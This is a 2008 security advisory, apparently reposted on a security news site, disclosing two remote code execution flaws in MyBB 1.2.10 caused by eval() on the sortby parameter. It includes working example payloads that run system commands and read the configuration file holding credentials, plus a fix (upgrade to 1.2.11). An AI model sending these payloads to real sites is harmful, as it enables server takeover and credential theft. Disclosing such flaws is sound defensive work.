Remote Code Execution in MyBB 1.2.10

Advisory Text :

[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10

========================================================================
=======

Author: Janek Vind "waraxe"

Independent discovery: koziolek

Date: 16. January 2008

Location: Estonia, Tartu

Web: http://www.waraxe.us/advisory-61.html

Target software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

MyBB is a discussion board that has been around for a while; it has
evolved

from other bulletin boards into the forum package it is today. Therefore,

it is a professional and efficient discussion board, developed by an
active

team of developers.

Vulnerabilities discovered

========================================================================
=======

1. Remote Code Execution in "forumdisplay.php":

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Precondition: valid forum "fid" must be known.

Attacker doesn't need to have any privileges in mybb installation to be

successful in attack.

Proof-Of-Concept request:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='

... and we will see error message:

Parse error: syntax error, unexpected ''', expecting ']' in

C:apache_wwwrootmybb.1.2.10forumdisplay.php(407) : eval()'d code on line 1

Problematic piece of code is related to "eval()" function:

eval("$orderarrow['$sortby'] = "".

$templates->get("forumdisplay_orderarrow")."";");

Example attacks:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2

&sortby='];phpinfo();exit;//

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2

&sortby='];system('ls');exit;//

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2

&sortby='];readfile('inc/config.php');exit;//

2. Remote Code Execution in "search.php":

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Precondition: search "sid" must be known - but that's trivial task.

Attacker doesn't need to have any privileges in mybb installation to be

successful in attack.

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid
here]

&sortby='

Parse error: syntax error, unexpected ''', expecting ']' in

C:apache_wwwrootmybb.1.2.10search.php(141) : eval()'d code on line 1

Problematic is exactly same piece of code, as in previous case:

eval("$orderarrow['$sortby'] = "".

$templates->get("forumdisplay_orderarrow")."";");

Example attacks:

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid
here]

&sortby='];phpinfo();exit;//

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid
here]

&sortby='];system('ls');exit;//

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid
here]

&sortby='];readfile('inc/config.php');exit;//

Both remote code execution security holes are very dangerous and can be

used by attacker to complete takeover the website and possible total

compromise of webserver.

How to fix:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Download MyBB new version 1.2.11 as soon as possible!

Greetings:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb

and anyone else who know me!

Greetings to Raido Kerna. Tervitusi Torufoorumi rahvale!

Contact:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

come2waraxe (at) yahoo (dot) com [email concealed]

Janek Vind "waraxe"

Homepage: http://www.janekvind.com/

Waraxe forum: http://www.waraxe.us/forums.html

---------------------------------- [ EOF ]
------------------------------------

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

Remote Code Execution in MyBB 1.2.10